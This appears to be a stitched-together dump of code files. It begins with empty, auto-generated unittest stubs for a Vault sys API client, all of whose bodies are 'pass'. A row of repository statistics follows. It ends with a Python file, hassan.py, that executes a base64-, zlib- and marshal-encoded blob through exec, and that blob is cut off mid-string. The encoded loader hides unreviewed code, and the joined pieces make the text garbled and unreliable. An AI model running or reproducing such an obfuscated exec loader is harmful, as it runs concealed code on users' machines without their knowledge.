def test_get_sys_auth_path_tune(self):
"""Test case for get_sys_auth_path_tune
Reads the given auth path's configuration. # noqa: E501
"""
pass
def test_get_sys_config_auditing_request_headers(self):
"""Test case for get_sys_config_auditing_request_headers
List the request headers that are configured to be audited. # noqa: E501
"""
pass
def test_get_sys_config_auditing_request_headers_header(self):
"""Test case for get_sys_config_auditing_request_headers_header
List the information for the given request header. # noqa: E501
"""
pass
def test_get_sys_config_control_group(self):
"""Test case for get_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_get_sys_config_cors(self):
"""Test case for get_sys_config_cors
Return the current CORS settings. # noqa: E501
"""
pass
def test_get_sys_config_ui_headers(self):
"""Test case for get_sys_config_ui_headers
Return a list of configured UI headers. # noqa: E501
"""
pass
def test_get_sys_config_ui_headers_header(self):
"""Test case for get_sys_config_ui_headers_header
Return the given UI header's configuration # noqa: E501
"""
pass
def test_get_sys_generate_root(self):
"""Test case for get_sys_generate_root
Read the configuration and progress of the current root generation attempt. # noqa: E501
"""
pass
def test_get_sys_generate_root_attempt(self):
"""Test case for get_sys_generate_root_attempt
Read the configuration and progress of the current root generation attempt. # noqa: E501
"""
pass
def test_get_sys_health(self):
"""Test case for get_sys_health
Returns the health status of Vault. # noqa: E501
"""
pass
def test_get_sys_init(self):
"""Test case for get_sys_init
Returns the initialization status of Vault. # noqa: E501
"""
pass
def test_get_sys_internal_specs_openapi(self):
"""Test case for get_sys_internal_specs_openapi
Generate an OpenAPI 3 document of all mounted paths. # noqa: E501
"""
pass
def test_get_sys_internal_ui_mounts(self):
"""Test case for get_sys_internal_ui_mounts
Lists all enabled and visible auth and secrets mounts. # noqa: E501
"""
pass
def test_get_sys_internal_ui_mounts_path(self):
"""Test case for get_sys_internal_ui_mounts_path
Return information about the given mount. # noqa: E501
"""
pass
def test_get_sys_key_status(self):
"""Test case for get_sys_key_status
Provides information about the backend encryption key. # noqa: E501
"""
pass
def test_get_sys_leader(self):
"""Test case for get_sys_leader
Returns the high availability status and current leader instance of Vault. # noqa: E501
"""
pass
def test_get_sys_leases_lookup(self):
"""Test case for get_sys_leases_lookup
Returns a list of lease ids. # noqa: E501
"""
pass
def test_get_sys_leases_lookup_prefix(self):
"""Test case for get_sys_leases_lookup_prefix
Returns a list of lease ids. # noqa: E501
"""
pass
def test_get_sys_license(self):
"""Test case for get_sys_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_get_sys_metrics(self):
"""Test case for get_sys_metrics
Export the metrics aggregated for telemetry purpose. # noqa: E501
"""
pass
def test_get_sys_mfa_method(self):
"""Test case for get_sys_mfa_method
Lists all the available MFA methods by their name. # noqa: E501
"""
pass
def test_get_sys_mfa_method_duo_name(self):
"""Test case for get_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_okta_name(self):
"""Test case for get_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_pingid_name(self):
"""Test case for get_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_totp_name(self):
"""Test case for get_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_get_sys_mfa_method_totp_name_generate(self):
"""Test case for get_sys_mfa_method_totp_name_generate
Generates a TOTP secret for the given method name on the entity of the calling token. # noqa: E501
"""
pass
def test_get_sys_mounts(self):
"""Test case for get_sys_mounts
List the currently mounted backends. # noqa: E501
"""
pass
def test_get_sys_mounts_path_tune(self):
"""Test case for get_sys_mounts_path_tune
Tune backend configuration parameters for this mount. # noqa: E501
"""
pass
def test_get_sys_namespaces(self):
"""Test case for get_sys_namespaces
"""
pass
def test_get_sys_namespaces_path(self):
"""Test case for get_sys_namespaces_path
"""
pass
def test_get_sys_plugins_catalog(self):
"""Test case for get_sys_plugins_catalog
Lists all the plugins known to Vault # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_name(self):
"""Test case for get_sys_plugins_catalog_name
Return the configuration data for the plugin with the given name. # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_type(self):
"""Test case for get_sys_plugins_catalog_type
List the plugins in the catalog. # noqa: E501
"""
pass
def test_get_sys_plugins_catalog_type_name(self):
"""Test case for get_sys_plugins_catalog_type_name
Return the configuration data for the plugin with the given name. # noqa: E501
"""
pass
def test_get_sys_policies_acl(self):
"""Test case for get_sys_policies_acl
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_acl_name(self):
"""Test case for get_sys_policies_acl_name
Retrieve information about the named ACL policy. # noqa: E501
"""
pass
def test_get_sys_policies_egp(self):
"""Test case for get_sys_policies_egp
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_egp_name(self):
"""Test case for get_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_get_sys_policies_rgp(self):
"""Test case for get_sys_policies_rgp
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policies_rgp_name(self):
"""Test case for get_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_get_sys_policy(self):
"""Test case for get_sys_policy
List the configured access control policies. # noqa: E501
"""
pass
def test_get_sys_policy_name(self):
"""Test case for get_sys_policy_name
Retrieve the policy body for the named policy. # noqa: E501
"""
pass
def test_get_sys_rekey_backup(self):
"""Test case for get_sys_rekey_backup
Return the backup copy of PGP-encrypted unseal keys. # noqa: E501
"""
pass
def test_get_sys_rekey_init(self):
"""Test case for get_sys_rekey_init
Reads the configuration and progress of the current rekey attempt. # noqa: E501
"""
pass
def test_get_sys_rekey_recovery_key_backup(self):
"""Test case for get_sys_rekey_recovery_key_backup
Allows fetching or deleting the backup of the rotated unseal keys. # noqa: E501
"""
pass
def test_get_sys_rekey_verify(self):
"""Test case for get_sys_rekey_verify
Read the configuration and progress of the current rekey verification attempt. # noqa: E501
"""
pass
def test_get_sys_replication_dr_secondary_license(self):
"""Test case for get_sys_replication_dr_secondary_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_get_sys_replication_dr_status(self):
"""Test case for get_sys_replication_dr_status
"""
pass
def test_get_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for get_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_get_sys_replication_performance_status(self):
"""Test case for get_sys_replication_performance_status
"""
pass
def test_get_sys_replication_status(self):
"""Test case for get_sys_replication_status
"""
pass
def test_get_sys_seal_status(self):
"""Test case for get_sys_seal_status
Check the seal status of a Vault. # noqa: E501
"""
pass
def test_get_sys_wrapping_lookup(self):
"""Test case for get_sys_wrapping_lookup
Look up wrapping properties for the requester's token. # noqa: E501
"""
pass
def test_post_sys_audit_hash_path(self):
"""Test case for post_sys_audit_hash_path
The hash of the given string via the given audit backend # noqa: E501
"""
pass
def test_post_sys_audit_path(self):
"""Test case for post_sys_audit_path
Enable a new audit device at the supplied path. # noqa: E501
"""
pass
def test_post_sys_auth_path(self):
"""Test case for post_sys_auth_path
Enables a new auth method. # noqa: E501
"""
pass
def test_post_sys_auth_path_tune(self):
"""Test case for post_sys_auth_path_tune
Tune configuration parameters for a given auth path. # noqa: E501
"""
pass
def test_post_sys_capabilities(self):
"""Test case for post_sys_capabilities
Fetches the capabilities of the given token on the given path. # noqa: E501
"""
pass
def test_post_sys_capabilities_accessor(self):
"""Test case for post_sys_capabilities_accessor
Fetches the capabilities of the token associated with the given token, on the given path. # noqa: E501
"""
pass
def test_post_sys_capabilities_self(self):
"""Test case for post_sys_capabilities_self
Fetches the capabilities of the given token on the given path. # noqa: E501
"""
pass
def test_post_sys_config_auditing_request_headers_header(self):
"""Test case for post_sys_config_auditing_request_headers_header
Enable auditing of a header. # noqa: E501
"""
pass
def test_post_sys_config_control_group(self):
"""Test case for post_sys_config_control_group
Configure control group global settings. # noqa: E501
"""
pass
def test_post_sys_config_cors(self):
"""Test case for post_sys_config_cors
Configure the CORS settings. # noqa: E501
"""
pass
def test_post_sys_config_ui_headers_header(self):
"""Test case for post_sys_config_ui_headers_header
Configure the values to be returned for the UI header. # noqa: E501
"""
pass
def test_post_sys_control_group_authorize(self):
"""Test case for post_sys_control_group_authorize
Authorize a control group request # noqa: E501
"""
pass
def test_post_sys_control_group_request(self):
"""Test case for post_sys_control_group_request
Check the status of a control group request # noqa: E501
"""
pass
def test_post_sys_generate_root(self):
"""Test case for post_sys_generate_root
Initializes a new root generation attempt. # noqa: E501
"""
pass
def test_post_sys_generate_root_attempt(self):
"""Test case for post_sys_generate_root_attempt
Initializes a new root generation attempt. # noqa: E501
"""
pass
def test_post_sys_generate_root_update(self):
"""Test case for post_sys_generate_root_update
Enter a single master key share to progress the root generation attempt. # noqa: E501
"""
pass
def test_post_sys_init(self):
"""Test case for post_sys_init
Initialize a new Vault. # noqa: E501
"""
pass
def test_post_sys_leases_lookup(self):
"""Test case for post_sys_leases_lookup
Retrieve lease metadata. # noqa: E501
"""
pass
def test_post_sys_leases_renew(self):
"""Test case for post_sys_leases_renew
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_leases_renew_url_lease_id(self):
"""Test case for post_sys_leases_renew_url_lease_id
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_leases_revoke(self):
"""Test case for post_sys_leases_revoke
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_leases_revoke_force_prefix(self):
"""Test case for post_sys_leases_revoke_force_prefix
Revokes all secrets or tokens generated under a given prefix immediately # noqa: E501
"""
pass
def test_post_sys_leases_revoke_prefix_prefix(self):
"""Test case for post_sys_leases_revoke_prefix_prefix
Revokes all secrets (via a lease ID prefix) or tokens (via the tokens' path property) generated under a given prefix immediately. # noqa: E501
"""
pass
def test_post_sys_leases_revoke_url_lease_id(self):
"""Test case for post_sys_leases_revoke_url_lease_id
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_leases_tidy(self):
"""Test case for post_sys_leases_tidy
This endpoint performs cleanup tasks that can be run if certain error conditions have occurred. # noqa: E501
"""
pass
def test_post_sys_license(self):
"""Test case for post_sys_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_post_sys_mfa_method_duo_name(self):
"""Test case for post_sys_mfa_method_duo_name
Defines or updates a Duo MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_okta_name(self):
"""Test case for post_sys_mfa_method_okta_name
Defines or updates an Okta MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_pingid_name(self):
"""Test case for post_sys_mfa_method_pingid_name
Defines or updates a PingID MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name(self):
"""Test case for post_sys_mfa_method_totp_name
Defines or updates a TOTP MFA method. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name_admin_destroy(self):
"""Test case for post_sys_mfa_method_totp_name_admin_destroy
Deletes the TOTP secret for the given method name on the given entity. # noqa: E501
"""
pass
def test_post_sys_mfa_method_totp_name_admin_generate(self):
"""Test case for post_sys_mfa_method_totp_name_admin_generate
Generates a TOTP secret for the given method name on the given entity. # noqa: E501
"""
pass
def test_post_sys_mounts_path(self):
"""Test case for post_sys_mounts_path
Enable a new secrets engine at the given path. # noqa: E501
"""
pass
def test_post_sys_mounts_path_tune(self):
"""Test case for post_sys_mounts_path_tune
Tune backend configuration parameters for this mount. # noqa: E501
"""
pass
def test_post_sys_namespaces_path(self):
"""Test case for post_sys_namespaces_path
"""
pass
def test_post_sys_plugins_catalog_name(self):
"""Test case for post_sys_plugins_catalog_name
Register a new plugin, or updates an existing one with the supplied name. # noqa: E501
"""
pass
def test_post_sys_plugins_catalog_type_name(self):
"""Test case for post_sys_plugins_catalog_type_name
Register a new plugin, or updates an existing one with the supplied name. # noqa: E501
"""
pass
def test_post_sys_plugins_reload_backend(self):
"""Test case for post_sys_plugins_reload_backend
Reload mounted plugin backends. # noqa: E501
"""
pass
def test_post_sys_policies_acl_name(self):
"""Test case for post_sys_policies_acl_name
Add a new or update an existing ACL policy. # noqa: E501
"""
pass
def test_post_sys_policies_egp_name(self):
"""Test case for post_sys_policies_egp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_post_sys_policies_rgp_name(self):
"""Test case for post_sys_policies_rgp_name
Read, Modify, or Delete an access control policy. # noqa: E501
"""
pass
def test_post_sys_policy_name(self):
"""Test case for post_sys_policy_name
Add a new or update an existing policy. # noqa: E501
"""
pass
def test_post_sys_rekey_init(self):
"""Test case for post_sys_rekey_init
Initializes a new rekey attempt. # noqa: E501
"""
pass
def test_post_sys_rekey_update(self):
"""Test case for post_sys_rekey_update
Enter a single master key share to progress the rekey of the Vault. # noqa: E501
"""
pass
def test_post_sys_rekey_verify(self):
"""Test case for post_sys_rekey_verify
Enter a single new key share to progress the rekey verification operation. # noqa: E501
"""
pass
def test_post_sys_remount(self):
"""Test case for post_sys_remount
Move the mount point of an already-mounted backend. # noqa: E501
"""
pass
def test_post_sys_renew(self):
"""Test case for post_sys_renew
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_renew_url_lease_id(self):
"""Test case for post_sys_renew_url_lease_id
Renews a lease, requesting to extend the lease. # noqa: E501
"""
pass
def test_post_sys_replication_dr_primary_demote(self):
"""Test case for post_sys_replication_dr_primary_demote
"""
pass
def test_post_sys_replication_dr_primary_disable(self):
"""Test case for post_sys_replication_dr_primary_disable
"""
pass
def test_post_sys_replication_dr_primary_enable(self):
"""Test case for post_sys_replication_dr_primary_enable
"""
pass
def test_post_sys_replication_dr_primary_revoke_secondary(self):
"""Test case for post_sys_replication_dr_primary_revoke_secondary
"""
pass
def test_post_sys_replication_dr_primary_secondary_token(self):
"""Test case for post_sys_replication_dr_primary_secondary_token
"""
pass
def test_post_sys_replication_dr_secondary_disable(self):
"""Test case for post_sys_replication_dr_secondary_disable
"""
pass
def test_post_sys_replication_dr_secondary_enable(self):
"""Test case for post_sys_replication_dr_secondary_enable
"""
pass
def test_post_sys_replication_dr_secondary_generate_public_key(self):
"""Test case for post_sys_replication_dr_secondary_generate_public_key
"""
pass
def test_post_sys_replication_dr_secondary_license(self):
"""Test case for post_sys_replication_dr_secondary_license
The path responds to the following HTTP methods. GET / Returns information on the installed license POST Sets the license for the server # noqa: E501
"""
pass
def test_post_sys_replication_dr_secondary_operation_token_delete(self):
"""Test case for post_sys_replication_dr_secondary_operation_token_delete
"""
pass
def test_post_sys_replication_dr_secondary_promote(self):
"""Test case for post_sys_replication_dr_secondary_promote
"""
pass
def test_post_sys_replication_dr_secondary_reindex(self):
"""Test case for post_sys_replication_dr_secondary_reindex
"""
pass
def test_post_sys_replication_dr_secondary_update_primary(self):
"""Test case for post_sys_replication_dr_secondary_update_primary
"""
pass
def test_post_sys_replication_performance_primary_demote(self):
"""Test case for post_sys_replication_performance_primary_demote
"""
pass
def test_post_sys_replication_performance_primary_disable(self):
"""Test case for post_sys_replication_performance_primary_disable
"""
pass
def test_post_sys_replication_performance_primary_enable(self):
"""Test case for post_sys_replication_performance_primary_enable
"""
pass
def test_post_sys_replication_performance_primary_mount_filter_id(self):
"""Test case for post_sys_replication_performance_primary_mount_filter_id
"""
pass
def test_post_sys_replication_performance_primary_revoke_secondary(self):
"""Test case for post_sys_replication_performance_primary_revoke_secondary
"""
pass
def test_post_sys_replication_performance_primary_secondary_token(self):
"""Test case for post_sys_replication_performance_primary_secondary_token
"""
pass
def test_post_sys_replication_performance_secondary_disable(self):
"""Test case for post_sys_replication_performance_secondary_disable
"""
pass
def test_post_sys_replication_performance_secondary_enable(self):
"""Test case for post_sys_replication_performance_secondary_enable
"""
pass
def test_post_sys_replication_performance_secondary_generate_public_key(self):
"""Test case for post_sys_replication_performance_secondary_generate_public_key
"""
pass
def test_post_sys_replication_performance_secondary_promote(self):
"""Test case for post_sys_replication_performance_secondary_promote
"""
pass
def test_post_sys_replication_performance_secondary_update_primary(self):
"""Test case for post_sys_replication_performance_secondary_update_primary
"""
pass
def test_post_sys_replication_primary_demote(self):
"""Test case for post_sys_replication_primary_demote
"""
pass
def test_post_sys_replication_primary_disable(self):
"""Test case for post_sys_replication_primary_disable
"""
pass
def test_post_sys_replication_primary_enable(self):
"""Test case for post_sys_replication_primary_enable
"""
pass
def test_post_sys_replication_primary_revoke_secondary(self):
"""Test case for post_sys_replication_primary_revoke_secondary
"""
pass
def test_post_sys_replication_primary_secondary_token(self):
"""Test case for post_sys_replication_primary_secondary_token
"""
pass
def test_post_sys_replication_recover(self):
"""Test case for post_sys_replication_recover
"""
pass
def test_post_sys_replication_reindex(self):
"""Test case for post_sys_replication_reindex
"""
pass
def test_post_sys_replication_secondary_disable(self):
"""Test case for post_sys_replication_secondary_disable
"""
pass
def test_post_sys_replication_secondary_enable(self):
"""Test case for post_sys_replication_secondary_enable
"""
pass
def test_post_sys_replication_secondary_promote(self):
"""Test case for post_sys_replication_secondary_promote
"""
pass
def test_post_sys_replication_secondary_update_primary(self):
"""Test case for post_sys_replication_secondary_update_primary
"""
pass
def test_post_sys_revoke(self):
"""Test case for post_sys_revoke
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_revoke_force_prefix(self):
"""Test case for post_sys_revoke_force_prefix
Revokes all secrets or tokens generated under a given prefix immediately # noqa: E501
"""
pass
def test_post_sys_revoke_prefix_prefix(self):
"""Test case for post_sys_revoke_prefix_prefix
Revokes all secrets (via a lease ID prefix) or tokens (via the tokens' path property) generated under a given prefix immediately. # noqa: E501
"""
pass
def test_post_sys_revoke_url_lease_id(self):
"""Test case for post_sys_revoke_url_lease_id
Revokes a lease immediately. # noqa: E501
"""
pass
def test_post_sys_rotate(self):
"""Test case for post_sys_rotate
Rotates the backend encryption key used to persist data. # noqa: E501
"""
pass
def test_post_sys_seal(self):
"""Test case for post_sys_seal
Seal the Vault. # noqa: E501
"""
pass
def test_post_sys_step_down(self):
"""Test case for post_sys_step_down
Cause the node to give up active status. # noqa: E501
"""
pass
def test_post_sys_tools_hash(self):
"""Test case for post_sys_tools_hash
Generate a hash sum for input data # noqa: E501
"""
pass
def test_post_sys_tools_hash_urlalgorithm(self):
"""Test case for post_sys_tools_hash_urlalgorithm
Generate a hash sum for input data # noqa: E501
"""
pass
def test_post_sys_tools_random(self):
"""Test case for post_sys_tools_random
Generate random bytes # noqa: E501
"""
pass
def test_post_sys_tools_random_urlbytes(self):
"""Test case for post_sys_tools_random_urlbytes
Generate random bytes # noqa: E501
"""
pass
def test_post_sys_unseal(self):
"""Test case for post_sys_unseal
Unseal the Vault. # noqa: E501
"""
pass
def test_post_sys_wrapping_lookup(self):
"""Test case for post_sys_wrapping_lookup
Look up wrapping properties for the given token. # noqa: E501
"""
pass
def test_post_sys_wrapping_rewrap(self):
"""Test case for post_sys_wrapping_rewrap
Rotates a response-wrapped token. # noqa: E501
"""
pass
def test_post_sys_wrapping_unwrap(self):
"""Test case for post_sys_wrapping_unwrap
Unwraps a response-wrapped token. # noqa: E501
"""
pass
def test_post_sys_wrapping_wrap(self):
"""Test case for post_sys_wrapping_wrap
Response-wraps an arbitrary JSON object. # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 27.757235 | 184 | 0.65488 | 4,537 | 34,530 | 4.623981 | 0.069209 | 0.066066 | 0.093856 | 0.127985 | 0.887411 | 0.876114 | 0.857572 | 0.775251 | 0.601697 | 0.413366 | 0 | 0.017103 | 0.283753 | 34,530 | 1,243 | 185 | 27.779566 | 0.83115 | 0.513756 | 0 | 0.486486 | 0 | 0 | 0.00059 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.489189 | false | 0.486486 | 0.013514 | 0 | 0.505405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
11c17c8e68588618ffac879c5592e2a7ff3e22e7 | 28,624 | py | Python | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | hassan.py | hassan5542/royal | 4cecd3fcbb2c8631385d5b72c6a9a214dd20420f | [
"BSL-1.0"
] | null | null | null | import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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